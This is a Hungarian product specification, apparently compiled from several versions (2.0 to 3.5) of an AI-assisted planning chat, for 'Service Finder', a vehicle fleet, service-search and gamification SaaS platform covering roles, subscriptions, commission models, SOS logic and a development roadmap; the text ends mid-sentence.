Nemzetközi nyitás alapjai. + +FÁZIS 3 (MONETIZÁCIÓ & PRO): + +Hirdetési rendszer (PPC/Fix). + +TMS és Telematika modulok. + +Rendezvény szervezés. + +📝 III. ÜZLETI ÉS FEEDBACK MODUL néven: + +3.1 Üzletkötői hálózat: + +Struktúra: Kizárólag jutalékos rendszer, három szinttel (Junior, Senior, Country Boss). + +Területek: Flotta-akvizíció (SaaS) és Szerviz-partneri hirdetések. + +Kifizetés: Szerződött partnereknek pénzügyi elszámolás, alkalmi ajánlóknak max. 2 havi Prémium/Kredit jóváírás. + +3.2 Feedback és Minőségbiztosítás: + +Hiba-bejelentés: Automatizált diagnosztikai adatok küldése az alkalmazásból. + +Fejlesztési javaslatok: Közösségi szavazásra bocsátott ötletek, rangsorolt megvalósítás. + +Jutalmazás: A valid hibákért és sikeres fejlesztési ötletekért extra pontok és "System Builder" rang jár. + +🏢 1. Az "Üzletkötői Portál" (Partner Dashboard) +Azok számára, akik fizetést vagy valódi pénzbeli jutalékot akarnak, egy külön szintet kell létrehozni a rendszerben. + +Szerződéses háttér: Náluk a regisztráció nem egy gombnyomás. Fel kell tölteniük a vállalkozói igazolványukat vagy cégadataikat, és egy digitális keretszerződést kell kötniük veled. + +Egyedi Partnerkódok: Olyan kódokat kapnak, amelyek nem csak kedvezményt adnak az ügyfélnek, hanem a rendszerben "Jutalékos" jelzővel vannak ellátva. + +Transzparencia: Egy külön felületen látják, hány cég regisztrált a kódjukkal, mennyi volt a befizetett összeg, és mennyi a felhalmozott, kifizethető jutalékuk. + +💰 2. Jutalékkezelési Modellek (Pénzügyi logika) +Ahelyett, hogy fix fizetést adnál (ami nagy kockázat az elején), a sikerdíjas modellt javaslom, három szinten: + +Szervezési jutalék (Egyszeri): Az első éves vagy féléves előfizetési díj egy magasabb százaléka (pl. 15-20%). + +Gondozási jutalék (Recurring): Amíg az ügyfél fizeti a havidíjat, az üzletkötő kap egy kisebb, fix százalékot (pl. 3-5%). Ez motiválja őt, hogy tartsa a kapcsolatot a flottával, segítsen nekik az adatok tisztításában. + +Adattisztítási bónusz: Ha egy moderátor/üzletkötő manuálisan validál egy szervizt vagy ellenőriz egy vitatott adatot, fix összeget (pl. 0.5 - 1 €) írhatunk jóvá a számláján munkadíjként. + +🌍 3. Nemzetközi "Master Franchise" Modell +Ha kilépünk az országhatáron kívülre, nem tudsz mindenhol te lenni a moderátor. Ilyenkor jön a Country Manager szint: + +Országfelelős: Ő kap egy százalékot az összes adott országból származó bevételből. + +Feladata: Ő kezeli a helyi üzletkötőket, ő felel a jogszabályi sablonok (műszaki vizsga időközök, adók) helyességéért, és ő végzi a legfelsőbb szintű moderációt. + +🛠️ 4. Technikai megvalósítás (Pénztárcabarát módon) +Hogy ne kelljen bonyolult bérszámfejtő szoftvert írnunk: + +Kifizetési küszöb: Csak akkor kérhet kifizetést, ha elér pl. 100 € jutalékot. + +Számlázás: Ő állít ki neked egy számlát "Marketing tevékenység" vagy "Adatkezelés" címen, te pedig utalsz. + +Kredit-Pénz hibrid: Az üzletkötő választhat: ha pénzben kéri, adózni kell utána. Ha kreditben kéri (hogy hirdesse a saját üzletét a rendszerben), akkor több "virtuális értéket" kap. + +📝 Mesterterv Kiegészítés (v3.3) +Partneri és Üzletkötői Modul: + +Hibrid Jutalmazás: Lakossági szinten Kredit, Üzletkötői szinten Pénzbeli jutalék (Szerződés alapján). + +Partner Dashboard: Külön felület az értékesítési statisztikák és kifizetések követésére. + +B2B Protection: Céges előfizetés esetén a magánszemély meghívója nem kaphat privát anyagi előnyt, a jutalékot vagy a cég kapja kedvezményként, vagy a hivatásos üzletkötő jutalékként. + +📘 SERVICE FINDER ECOSYSTEM – FINAL MASTER SPECIFICATION (v3.5) +Dátum: 2026.01.24. | Státusz: Fejlesztésre kész (Ready for Implementation) + +1. Média és Offline Kezelés +Média: Kizárólag fotó alapú rögzítés (számla, forgalmi, állapotrögzítés). Nincs videótámogatás a sávszélesség és tárolási költségek optimalizálása érdekében. + +Offline mód: PWA/Mobil kliens oldali gyorsítótárazás. Az adatok netkapcsolat hiányában a telefonon tárolódnak. + +Háttér-szinkronizáció: Amint Wi-Fi vagy mobilnet rendelkezésre áll, az alkalmazás a háttérben (indítás nélkül is) elküldi a függőben lévő adatokat a szerverre. + +2. SOS és Helymeghatározás +Logika: Nincs folyamatos GPS követés (erőforrás-kímélés). + +SOS Esemény: Csak a gomb megnyomásakor kérdezi le a rendszer a koordinátákat. + +Megjelenítés: A user kijelzőjén azonnal megjelenik a pontos GPS koordináta és (geocoding segítségével) a legközelebbi cím (város, utca, házszám), hogy segítse a szóbeli hibabejelentést. + +3. Felhasználói Élmény (UI/UX Strategy) +Hibrid Dizájn: Letisztult, funkcionális alapfelület (B2B/Flotta), amely kreditért vásárolható egyedi skinekkel, ikonokkal és animációkkal tehető "csicsássá" a magánszemélyek/fiatalok számára. + +🛠️ Megvalósítási Útmutató (PM-nek és Fejlesztőnek) +Mivel a tervezési fázist lezártuk, íme a technikai start-szekvencia, amint hozzáférsz a szerverhez: + +Infrastruktúra ellenőrzése: + +Docker konténerek futásának ellenőrzése (docker ps). + +Adatbázis elérés tesztelése (pgAdmin vagy terminal). + +Környezeti változók (.env) véglegesítése: + +AWS SES (Email) API kulcsok. + +Google OAuth Client ID & Secret. + +WhatsApp/SMS Gateway API kulcsok. + +Adatbázis Migráció (Alembic): + +A korábban elkészített gamification.py, user.py, company.py és referral.py modellek alapján a táblák létrehozása a data sémában. + +Backend "Skeleton" felépítése: + +Routerek regisztrálása a main.py-ban. + +A háttérben futó szinkronizációs logikához szükséges "worker" (pl. Celery vagy FastAPI BackgroundTasks) beállítása. +_______________________________________________________________________________________________________________________________ + + + +A kérésedre a megoldás a "Modular Monolith" (Moduláris Monolit) dokumentáció. Hogy hogyan bontsuk? Úgy készítettem el az alábbi Master Dokumentumot, hogy MARKDOWN formátumban van. + +Hogyan használd új chat nyitásakor? Nem kell mást tenned, mint kimásolni az egész lenti blokkot (a --- vonalak között), és beilleszteni az új chat ablakba ezzel a felütéssel: + +"Szia! Itt a Service Finder projekt aktuális Mesterterve és státusza. Kérlek, olvasd el, tárold el a memóriádban, és ez alapján folytassuk a munkát." + +Íme a véglegesített, mindenre kiterjedő specifikáció: + +📂 SERVICE FINDER SPECIFICATION UPDATES +Módosított Modulok: Felhasználók, Üzleti Modell, Gamifikáció, Roadmap + +👤 II. FELHASZNÁLÓK ÉS CSALÁDI FLOTTÁK (MÓDOSÍTOTT) +A rendszer mindenkit "Flottaként" kezel, csak a méret és a jogi státusz változik. + +1. Magánszemély ("Mini Cég") +Struktúra: A Családfő (Tulajdonos) kezelheti a családi flottát. + +Hozzáadható tagok: Max 4 fő (pl. Házastárs, Gyerekek). Ők "Sofőr" szerepkört kapnak. + +Jármű limit: Alapcsomagban 3 db. + +Logika: Ugyanaz a kód fut a háttérben, mint a cégeknél, csak a gombok felirata barátságosabb (pl. "Sofőr hozzáadása" helyett "Családtag meghívása"). + +2. Validátor és Hirdetésszervező (Kiemelt Szerepkörök) +A közösségből kiemelkedő, megbízható felhasználók. + +Feladat: + +Helyi szervizek adatainak fizikai ellenőrzése (pl. "Tényleg létezik, ott a tábla"). + +Szervizek "beszervezése" hirdetőnek. + +Jutalom: + +Kiemelt státusz (Trust Score növelése). + +Jutalék (Kredit formájában): A beszervezett hirdetések után kreditet kap, amit saját prémiumra vagy szolgáltatásokra fordíthat. + +📊 V. ÜZLETI MODELL, LEJÁRAT ÉS PROMÓCIÓ (KOMBINÁLT v2.5) +Rugalmas bővítési lehetőségek, szigorú, de fair lejárat-kezelés és közösségi alapú marketing. + +1. Előfizetési Szintek és Bővítés +Free (Ingyenes): Max 3 jármű. (Reklámokkal támogatott, "Hirdető" szervizek előre sorolva a keresőben). + +Premium / VIP: Magasabb járműlimitek, reklámmentes felület, Excel export, részletes statisztikák. + +Kiegészítő Járműdíj (Add-on): + +Cél: Ha a felhasználó nem akar teljes csomagot váltani, de a limiten felül +1 autót rögzítene. + +Árazás (Magán): +300 Ft (vagy kredit) / hó / jármű. + +Árazás (Céges): +500 Ft (2 €) / hó / jármű. + +2. Lejárat és Türelmi Idő (Lifecycle Management) +A rendszer 3 fázisban kezeli a lejárt előfizetést vagy a be nem fizetett kiegészítő díjat: + +Fázis 1: Türelmi Idő és "Vak Rögzítés" (1-30. nap): + +Státusz: "Felfüggesztett / Grace". + +Adatkezelés (Write-Only): A felhasználó továbbra is be tudja írni a tankolást/szervizt (hogy ne legyen lyuk a szervizkönyvben), DE: + +Nem látja a statisztikákat és diagramokat. + +Nem látja a költségösszesítőt. + +Nem látja a részletes szerviztörténetet (csak rögzíteni tud). + +Minősítés: A "Trust Score" lassú csökkenésnek indul (mivel a rendszer nem futtat prémium anomália-ellenőrzéseket). + +Fázis 2: Leminősítés (31. naptól): + +Státusz: "Downgraded to Free". + +Korlátozás: A rendszer visszaállítja a fiókot Free szintre (Max 3 jármű). + +Szelekció: A felhasználónak ki kell választania, melyik 3 jármű marad aktív. A többi (4.+) jármű teljesen zárolásra kerül (már rögzíteni sem lehet hozzá adatot). + +Fázis 3: Visszamenőleges Aktiválás (Max 60. napig): + +Retroaktív fizetés: Ha a felhasználó újra fizet (és kifizeti a kimaradt időszakot is), a "Vak időszakban" rögzített adatok láthatóvá válnak, a statisztikák helyreállnak, és a Trust Score normalizálódik. + +3. Promóció, Referral és Hirdetésszervezés +A rendszer "Win-Win" alapon ösztönzi a terjedést. + +Szerviz Meghívása (B2B Referral): + +Logika: A User bemutatja az Appot egy szerviznek. + +Jutalom: Ha a szerviz regisztrál (a User kódjával), a User Kreditet kap, amit prémiumra vagy szolgáltatásra válthat. + +Ügyfélkedvezmény (B2C Benefit): + +Logika: A User az Appra hivatkozva érkezik a szervizbe ("Jöttem a Service Finderből"). + +Jutalom: A Szerviz X% kedvezményt biztosít (munkadíjból vagy alkatrészből). + +Előny: A szerviznek ez "sikerdíjas marketing" (csak akkor ad kedvezményt, ha ott a vevő), az App pedig ingyen reklámot kap. + +Helyi Szervezők (Validátorok): + +Kiemelt felhasználók, akik "Mini Ügynökként" működnek: ellenőrzik a helyi adatokat és segítik a szervizek regisztrációját (Kredit/Jutalék alapon). + +🏆 VIII. VERSENY ÉS ADATFELTÖLTÉS (ELŐREHOZVA!) +Ez a Launch Engine. A program terjedésének alapja. + +1. A Nagy Adatverseny (The Data Race) +Cél: A térkép "kifehérítése" (szervizekkel való feltöltése) minél rövidebb idő alatt. + +Pontozás: + +Új szerviz + Fotó + Nyitvatartás: +10 pont. + +Márkapspecializáció rögzítése (validáltan): +5 pont. + +Hirdető beszervezése (Partnerkód megadásával): +50 pont. + +Büntetés (-10 pont): Fals adat beküldése -> Kizárás a versenyből. + +2. Lokális Helytartók (Validátorok) +A rendszer automatikusan felajánlja a régió legaktívabb adatfeltöltőjének a "Helyi Validátor" címet. + +Ők hagyhatják jóvá a vitatott módosításokat a környékükön. + +🗓️ IX. FEJLESZTÉSI ÜTEMTERV (ÚJ ROADMAP) +A Gamifikáció az MVP utáni azonnali prioritás lett. + +Fázis 1 (MVP - Alapok): + +Core modul (Jármű, Költség, Szervizkereső). + +Mini-Cég / Családi logika implementálása. + +Költségek és Lejárat (Write-only mód) logikája. + +Fázis 2 (Növekedés - A Vírus): + +Gamifikáció és Verseny modul (Adatfeltöltés, Ranglisták). + +Validátor rendszer és Referral (Meghívás) követés. + +OCR (hogy a feltöltés könnyebb legyen). + +Fázis 3 (Monetizáció): + +Hirdetési rendszer (Kredit/Fix). + +Kiegészítő járműdíjak (Add-on fizetés). + +Ország sablonok. + +Fázis 4 (Expurzió): + +Telematika, TMS, Rendezvények. + +📂 SERVICE FINDER ECOSYSTEM – MASTER SPECIFICATION +Verzió: 2.3 (Véglegesített Logika: Telematika, TMS, Hibrid Hirdetés) Dátum: 2026.01.24. Státusz: MVP Fejlesztés alatt / Architektúra fixálva + +🏗️ 1. ARCHITEKTURÁLIS ALAPELVEK +A rendszer nem egyetlen app, hanem egy moduláris ökoszisztéma, amely egy közös adatbázison ("Single Source of Truth") osztozik. + +Core App (Service Finder): Nyilvántartás, Keresés, Költségek. + +TMS Modul (Logisztika): Útvonaltervezés, Fuvarszervezés (külön nézet/gomb). + +Telematika Modul (Biztosítás): Háttérben futó adatgyűjtés. + +Adatbázis: PostgreSQL (Shared DB) - A sofőrök, autók és cégek közösek minden modulban. + +👤 2. FELHASZNÁLÓK ÉS JOGOSULTSÁGOK (RBAC) + +Dinamikus, cégenként konfigurálható szerepkörök. + +Szerepkörök: + +Superadmin: Rendszerkarbantartás. + +Cégtulajdonos: Jogkezelés, Előfizetés menedzsment. + +Flotta Manager: TMS irányítás, Költség kontroll, Riasztások. + +Sofőr: + +Lakossági: Saját autó menedzselése. + +Céges: Hozzárendelt autók vezetése, TMS feladatok látása. + +Szerviz Partner: Időpontkezelés, Hirdetés kezelés. + +Nemzetközi Árazás (Geo-Pricing): + +Automatikus IP alapú detektálás regisztrációkor. + +Különböző árszabás (PPP alapú) országonként a kreditekre és előfizetésekre. + +🚗 3. JÁRMŰ ÉS KÖLTSÉG MODUL (CORE) +3.1. Jármű Adatmodell +Hierarchia: Kategória -> Márka -> Modell -> Generáció -> Motor. + +Felszereltség: Dinamikus JSON (Klíma, Multimédia, Felépítmény). + +Gumiabroncs: DOT szám figyelés, Szezonális riasztás. + +3.2. Költségnyilvántartás (Részletes) +Üzemeltetés: Üzemanyag, Adalék (AdBlue), Mosás/Kozmetika, Parkolás, Tárolás. + +Hatósági: Súlyadó/Cégautóadó, Útdíj (Matrica/HU-GO), Vagyonszerzési illeték, Eredetvizsga, Bírságok. + +Pénzügyi: Vételár, Lízing/Bérleti díj, Hitel, Értékcsökkenés. + +Biztosítás: KGFB, CASCO, Balesetbiztosítás. + +Karbantartás: Tervezett szerviz, Váratlan javítás, Gumiabroncs, Alkatrész. + +🛠️ 4. SZERVIZ KERESŐ ÉS SOS (CORE) +4.1. Keresési Logika +Fa-struktúra: Főkategória (Javítás) -> Alkategória (Mechanika) -> Címke (BMW). + +Ranking: Relevancia > Távolság > Hirdetői Státusz (Free usereknél) > Minőség. + +4.2. Vészhelyzeti Protokoll (SOS) +A felhasználó választása alapján: + +A) Biztonságos: Legközelebbi Szerződött/Preferált partner (akár távolabb). + +B) Gyors: Fizikailag legközelebbi műhely (akár validálatlan is). + +4.3. Értékelés +Többszempontú (Szakmai, Kommunikáció, Ár, Sebesség). + +Csak validált látogatás után (GPS/Számla). + +Munkafelvétel és Szerelő külön értékelhető (ha a szerviz engedélyezi). + +📊 5. ÜZLETI MODELL ÉS HIRDETÉS +5.1. Előfizetések (User oldal) +Free: Max 3 autó, Reklámok, PDF export. + +Premium: Max 5 autó, Nincs reklám, Excel export, Tiszta találatok. + +VIP (Flotta): 10+ autó, Anomália figyelés, TMS integráció lehetősége. + +5.2. Hirdetési Rendszer (Szolgáltató oldal) +Két párhuzamos modell (választható): + +Idő alapú (Subscription): Havi fix díjért állandó kiemelt hely/megjelenés. + +Kredit alapú (PPC/Performance): + +Feltöltött egyenlegből vonódik le minden megjelenés/kattintás után. + +Ha elfogy a kredit, a hirdetés leáll (normál listázásra vált). + +Statisztika: A hirdető részletes kimutatást kap a konverziókról. + +🛣️ 6. LOGISZTIKA ÉS TMS (PRO MODUL) +Külön nézet, de közös adatbázis. Gombnyomással váltható. + +Funkciók: + +Többpontos útvonaltervezés (Multi-drop). + +Útvonal optimalizálás (sorrendezés). + +Sofőr app nézet: Feladatlista, Vevő értesítése érkezéskor. + +Visszatérés bázisra vagy új pontra. + +Kapcsolat: A TMS-ben futott km és költség automatikusan bekerül a Core modul költségnyilvántartásába. + +📡 7. TELEMATIKA ÉS BIZTOSÍTÁS (INSURTECH MODUL) +Működés: Opt-in (Önkéntes) alapon. + +Adatgyűjtés: GPS, Gyorsulás (G-szenzor), Sebességprofil. + +Szinkronizáció: Wi-Fi/Mobilneten keresztül kötegelt feltöltés (nem real-time stream a sávszélesség védelméért, kivéve baleset). + +Cél: "Pay-how-you-drive" biztosítási ajánlatok generálása az alkuszi modulban. + +Privacy: Ha a user nem engedélyezi, nincs mérés, de nincs kedvezmény sem. + +🏆 8. KÖZÖSSÉG ÉS GAMIFIKÁCIÓ +8.1. Verseny és Pontgyűjtés +Cél: Adatbázis töltés (Új szerviz +5 pont, Validálás +1 pont). + +Büntetés: -10 pontnál kizárás a szerkesztésből (Read-only). + +Szezonok: 3-6 havonta díjazás (Pénz, VIP tagság). + +8.2. Rendezvények (MVP) +Funkció: Eseménynaptár + Térkép nézet (Hol van találkozó a közelben?). + +Típusok: Márkatalálkozó, Túra, Kiállítás. + +Jövő: Social feed, Csoportszervezés (későbbi fázis). + +🗓️ 9. FEJLESZTÉSI ÜTEMTERV (ROADMAP) +MVP (Most): Core modul (Jármű, Költség, Szervizkereső), Jogosultságok, MinIO/DB alapok. + +Fázis 2 (Adat): Ország sablonok, OCR, Gumiabroncs modul. + +Fázis 3 (Üzlet): Hirdetési rendszer (Kredit/Fix), Előfizetések. + +Fázis 4 (Expurzió): Telematika modul, TMS nézet, Gamifikáció start. + +📘 Service Finder – Rendszer Specifikáció 2.2 (MASTER) +Verzió: 2.2 (Nemzetközi Modul, SOS Logika, Szerviz Kereső, Gamifikáció) Státusz: Fejlesztésre kész (Ready for Development) + +I. Rendszer Architektúra (Technikai Alapok) +A rendszer célja egy nemzetközi, közösségi alapú jármű- és szerviznyilvántartó platform biztosítása SaaS modellben. + +Platform: Docker konténerizált környezet (FastAPI Backend, PostgreSQL DB, React Frontend, MinIO Storage). + +Adatbiztonság: Szigorú szeparálás (Tenant/User szinten). + +Elérés: Webes felület (PWA - Progresszív Web App), ami mobilon applikációként viselkedik. + +II. Felhasználók és Jogosultságok (RBAC) +A jogosultságok dinamikusak, cégenként/flottánként változhatnak. + +1. Szerepkörök +Superadmin: Rendszerkarbantartás. + +Cégtulajdonos: Jogokat oszthat ki és vonhat vissza (pl. kilépő dolgozó). + +Flotta Manager: Látja a riasztásokat, költségeket, visszaéléseket. + +Sofőr: + +Csak a hozzá rendelt időszakban látja az autót. + +Jogosultsága lehet: Csak Tankolás, Szerviz Rögzítés, vagy Teljes Nézet. + +Szerviz Partner: Saját adatlapot kezel, időpontot fogad, promóciót állít be. + +III. Jármű Nyilvántartás ("A Vas") +Hierarchikus, részletes adatstruktúra a pontos szerviz-ajánláshoz. + +1. Jármű Adatmodell +Törzsadatok: Kategória (Személy/Teher/Motor/Egyéb) -> Márka -> Modell -> Generáció -> Motor. + +Felszereltség (Dinamikus attribútumok): + +Személyautó: Klíma típus, Multimédia, Vonóhorog. + +Teherautó: Tachográf, Útdíj-box, Raktérhűtés. + +Speciális: Lószállító felépítmény, Lakóautó bútorzat. + +Gumiabroncs Modul: + +Márka, Típus, Méret, Évszak. + +DOT Figyelés: Riasztás 6 évnél öregebb gumi esetén. + +2. Nemzetközi Megfelelőség (EU Compliance) – ÚJ! +Ország Sablonok (Country Templates): A rendszer előre definiált szabályrendszereket kínál fel (pl. "Magyarország", "Ausztria", "Németország"). + +Logika: A felhasználó kiválasztja az országot, a rendszer betölti a kötelező elemeket: + +Vizsga intervallumok: (Pl. HU: 4-2-2 év). + +Kötelező tartozékok: (Pl. Izzókészlet, Mellények száma). + +Adózási szabályok: (Cégautóadó, Súlyadó kalkuláció alapjai). + +Ideiglenes Engedélyek: Kezelni tudja az "Ideiglenes forgalomba helyezés" vagy "Próba rendszám" speciális lejáratait. + +IV. Szerviz Kereső és Szolgáltatások (A "Lelke") +Ez a modul köti össze a hibát a megoldással. + +1. Szolgáltatás Fa-struktúra (Taxonómia) +Nem ömlesztett lista, hanem címkézett fa-rendszer a pontos találatért: + +Főkategória: (Pl. Járműjavítás, Mentés, Kényelmi átalakítás). + +Alkategória: (Pl. Villamosság, Mechanika, Gumiszerviz). + +Specializáció (Címkék): (Pl. "Csak BMW", "Csak Klíma", "Lószállító építés"). + +Szűrés: Ha a jármű "Honda", a rendszer elrejti a "Csak BMW" címkéjű szervizeket, kivéve ha a felhasználó kéri az összeset. + +2. Keresési Logika (Matching Algorithm) +A találati lista sorrendjét az alábbi súlyozás határozza meg: + +Relevancia: Képes-e megoldani a konkrét hibát? (Pl. Defekt -> Gumis). + +Távolság: GPS alapú távolság. + +Előfizetés: A Hirdető/Partner szervizek előrébb (Free/Premium usereknél). VIP-nél csak a minőség dönt. + +Validáltság: Ellenőrzött szervizek előnyben. + +Minősítés: Csillagok és "Trust Score". + +3. Vészhelyzeti Protokoll (SOS) – ÚJ! +Két opciót kínál fel a rendszer (User Decision): + +"A" Opció (Biztonságos): A legközelebbi Szerződött/Preferált partner (lehet, hogy 50 km). + +"B" Opció (Gyors): A fizikailag legközelebbi szerviz, akár validálatlan is (lehet, hogy 2 km). + +Autómentés: Ha a jármű mozgásképtelen, a rendszer azonnal trélert vagy "Sárga Angyalt" ajánl a javítóműhely mellé. + +4. Progresszív Profilozás +A szervizek regisztrációja gyors (Név + Cím + Főtevékenység). + +Jutalmazás: Ha kitölti a részleteket (pl. "Vállalok hétvégét is", "Van váróterem"), jobban rangsorolja a rendszer. + +Feedback hurok: Ha a felhasználó jelzi, hogy "A szerviz adatlapja szerint van klímatöltés, de a helyszínen elhajtottak", a szerviz büntetőpontot kap. + +V. Értékelés és Minőségbiztosítás +1. Többszempontú Értékelés +Nem csak egy csillag, hanem kategóriák (1-5): + +Szakmai munka: Megjavult? + +Kommunikáció: Felvették a telefont? Kedvesek voltak? (Itt értékeljük a munkafelvételt név nélkül). + +Ár/Érték arány: Korrekt volt a számla? + +Sebesség: Tartották a határidőt? + +2. Validált Értékelés +Csak akkor értékelhet, ha igazolja, hogy ott járt (GPS check-in, Fotó a munkalapról, vagy Számla feltöltés). + +Negatív értékelés: Szervizenként/Javításonként max 1 db (Anti-spam). + +VI. Gamifikáció és Adatverseny +A közösség építi az adatbázist. + +1. Verseny Szezonok (3-6 hónap) +Cél: Minél több minőségi adat feltöltése. + +Pontozás: + ++5 pont: Új szerviz (validált adatokkal). + ++1 pont: Validálás (más által feltöltött adat megerősítése). + +-2 pont: Téves adat beküldése. + +Kizárás (-10 pont): A felhasználó elveszti a rögzítési jogot (Read-only), csak a saját költségeit írhatja. + +2. Jutalmazás +Ranglista alapján: Pénzjutalom (1-3.), VIP előfizetés, Prémium tagság. + +VII. Előfizetési Csomagok (Üzleti Modell) +Free: Max 3 jármű, Reklámok, PDF export, Hirdetők előre sorolva. + +Premium: Max 5 jármű, Nincs reklám, Excel export, Tiszta találati lista. + +VIP (Flotta): 10+ jármű. + +Anomália figyelés: Túl sok tankolás? Gyanús szervizszámla? + +Smart Alerts: Egyéni időzített értesítések. + +Prioritás: A rendszer a legideálisabb (nem a fizetett) szervizt adja. + +VIII. Fejlesztési Ütemterv (Roadmap) +Fázis 1 (MVP - A Gerinc): + +Adatbázis (User, Vehicle, Service, Ownership, Audit). + +Alap jogosultságok (Cég/Sofőr). + +Jármű rögzítés (Manuális) + Költség rögzítés. + +Szerviz kereső (Alap, távolság alapú). + +Fázis 2 (Okosítás): + +Sablon alapú Ország modul (HU, DE, AT kezdésnek). + +OCR bevezetése a dokumentumokhoz. + +Gumiabroncs (DOT) modul. + +Fázis 3 (Közösség): + +Gamifikáció és Verseny indítása. + +Részletes értékelési rendszer. + +VIP elemzések (Anomália detektálás). + +📘 Service Finder – Rendszer Specifikáció 2.1 +Verzió: 2.1 (Felszereltség, Előfizetések, Verseny és Launch Stratégia) Státusz: MVP + Üzleti Logika Véglegesítése + +I. Jármű Adatmodell & Felszereltség (Deep Dive) +A járművek típusától függően dinamikus felszereltség-listát kezelünk (JSONB formátumban tárolva a rugalmasságért). + +1. Kategória-specifikus Extrák +Személyautó: + +Klíma: Manuális, Automata, 2+ Zónás, Hőszivattyús (EV-nél kritikus). + +Multimédia: CarPlay/Android Auto, Navigáció, Hangrendszer. + +Motorkerékpár: + +Kényelem: Markolatfűtés, Ülésfűtés, Állítható szélvédő. + +Tech: USB töltő, Multimédia kijelző. + +Teherautó (Haszongépjármű): + +Ellenőrzés: Sofőr figyelő rendszer (DMS), Digitális Tachográf. + +Adminisztráció: Útlevél/Okmány író, Beépített útdíj-fizető (OBU). + +2. Adatfeltöltési Stratégia (Launch) +Kezdet: Manuális rögzítés, DE "Okos" segítséggel. + +Törzsadat Script: Python scripttel előtöltjük a leggyakoribb márkákat/típusokat (kb. a piac 75%-át). + +Kivételkezelés: Ha a felhasználó nem találja a típust, felvihet újat ("Egyéb"), de a rendszer fuzzy search (hasonlóság keresés) segítségével figyelmezteti: "Nem erre gondoltál: 'Toyota' a 'Tojota' helyett?" + +II. Előfizetési Modellek (Monetizáció) +A rendszer 3 szinten működik. + +1. Free (Ingyenes) +Limit: Max 3 jármű. + +Reklám: Belépéskor és statisztika letöltéskor. + +Keresés: A "Hirdető" (fizetős) szervizek előre sorolódnak (szponzorált találatok). + +Export: Csak PDF (nem szerkeszthető). + +Szerviz láthatóság: Összesítve látja a költségeket. + +2. Prémium (Haladó) +Limit: Max 5 jármű. + +Reklám: Nincs direkt reklám. + +Keresés: "Tiszta" találati lista (a hirdetők nem tolakodnak előre, valós értékelés dönt). + +Export: Excel (.xlsx) a saját elemzésekhez. + +3. VIP (Flotta / Pro) +Limit: 10 jármű (felette egyedi ajánlat). + +Funkciók: + +Intelligens Riasztások: Egyéni intervallumok (pl. "Szólj 60 nappal műszaki előtt"). + +Anomália Detektálás: Túlhasználat figyelése, átlagtól eltérő fogyasztás vagy gyanúsan magas szervizszámla jelzése a Managernek. + +Vizualizáció: Finomított havi diagramok, trendek. + +III. Közösség és Gamifikáció (A "Motor") +A cél az adatbázis minőségi feltöltése. + +1. Versenyszabályok +Időtartam: 3-6 hónapos "Szezonok". + +Díjazás: + +1-3. hely: Pénzjutalom. + +4-10. hely: VIP előfizetés (1 év). + +11-25. hely: Prémium (1 év). + +26-50. hely: Prémium (6 hónap). + +50-100. hely: Prémium (3 hónap). + +2. Pontrendszer és Büntetés ++5 pont: Új szerviz rögzítése (ha validált adatokkal történik). + ++1 pont: Validálás (az első 5 megerősítőnek). + +0 pont: További validálások (de növeli a szerviz népszerűségét). + +-2 pont: Rossz/Hamis adat megadása. + +KIZÁRÁS (-10 pontnál): A felhasználó "Read-only" módba kerül a közösségi téren. Nem vihet fel új szervizt, csak a saját költségeit rögzítheti meglévő partnerekhez. + +3. Szerviz Értékelés és Státusz +Státuszok: Rögzített -> Ellenőrzött (5 user által) -> Minősített/Hirdető. + +*Értékelés (1-5):** + +Kötelező elem: Munkalap/Számla fotó (vagy annak hiányának jelzése). + +Szabály: Pozitív értékelés minden eseménynél adható. Negatív értékelés szervizenként max 1x (spam védelem). + +4. Jármű Trust Score (%) +Nem bináris (Jó/Rossz), hanem százalékos. + +Egy kihagyott tankolás alig ront rajta. + +Súlyozás: A hivatalos (műszaki vizsga, szerviz) km óra állás fotóval sokkal többet ér, mint egy kézi tankolás bejegyzés. + +IV. Implementáció: Céges Modellek (Python Kód) +Ahhoz, hogy a fenti jogosultsági rendszert (Cégvezető vs. Sofőr) kezelni tudjuk, itt van a szükséges adatbázis modell. + +Ezt a kódot mentsd el a Code-Serverben: app/models/company.py + +📘 Service Finder – Rendszer Specifikáció 2.0 +Verzió: 2.0 (Bővített Üzleti és Gamifikációs Logika) Fókusz: MVP (Stabil alapok) + Jövőbiztos architektúra + +I. Felhasználók és Jogosultsági Rendszer (RBAC) +Itt élesen szétválasztjuk a Rendszerüzemeltetést (IT) és az Üzleti Működést (App). + +1. Rendszer Szint (IT & Support) +Superadmin: Hozzáférés az adatbázishoz, szerverhez (DevOps). + +Moderátor: Adatok validálása, vitás esetek rendezése, szerviz törzsadatok tisztítása. + +User (Technikai): Az alap entitás az adatbázisban. + +2. Alkalmazás Szint (Business Logic) – Dinamikus Jogosultságok +A jogosultságok nem "beégetettek", hanem Cégenként/Flottánként konfigurálhatók. + +Cégtulajdonos: + +Létrehozza a Céget/Flottát. + +Meghívhat Flotta Managert és Sofőrt. + +Joga van bármikor visszavonni a hozzáférést (pl. kilépő dolgozó azonnal elveszti az autók láthatóságát). + +Beállíthatja a szabályokat: "Ebben a cégben a sofőr csak tankolást rögzíthet, szervizt nem." + +Flotta Manager: + +Kezeli az autókat, kiosztja őket sofőröknek. + +Látja a lejáratokat, költségeket, riasztásokat. + +Sofőr: + +Vezethet egy vagy több autót (akár egyszerre több cégtől is). + +Csak a hozzá rendelt időszakban fér hozzá az autó adataihoz. + +Jogosultság: Lehet csak "Read-only" (látja a forgalmit), vagy "Editor" (rögzít tankolást). + +II. Jármű Adatmodell – A "Deep Dive" (Mély Adatbázis) +Az MVP-ben a struktúrát hozzuk létre, az adatokat folyamatosan töltjük. + +1. Hierarchikus Törzsadatok +Nem flat (sima) szövegként tároljuk, hanem relációs adatbázisban a pontos kereshetőségért: + +Kategória: Személyautó, Kisteher, Motor, Teherautó. + +Gyártó (Make): BMW, Honda, Toyota. + +Modell (Model): X5, CR-V, Yaris. + +Generáció/Évjárat: Pl. 2018-2022. + +Motor: Üzemanyag (Benzin/Diesel/Hybrid/EV) + Motorkód + Teljesítmény. + +Felszereltség (Trim): Ez a legnehezebb (Executive, M-Sport). MVP Megoldás: Kezdetben szöveges mező vagy JSON, később strukturált lista. + +2. Gumiabroncs Menedzsment (Tire Module) – Kiemelt Fontosságú +Külön tábla (vehicle_tires), mert kritikus biztonsági elem. + +Adatok: Márka, Típus, Méret (pl. 205/55 R16), Évszak (Nyári/Téli/4évszak). + +DOT Szám (Gyártási idő): Pl. "2223" (2023. 22. hét). + +Figyelmeztetések (Logika): + +Szezonális: "Itt a november, rakd fel a télit!" + +Kor alapú: "A gumi elmúlt 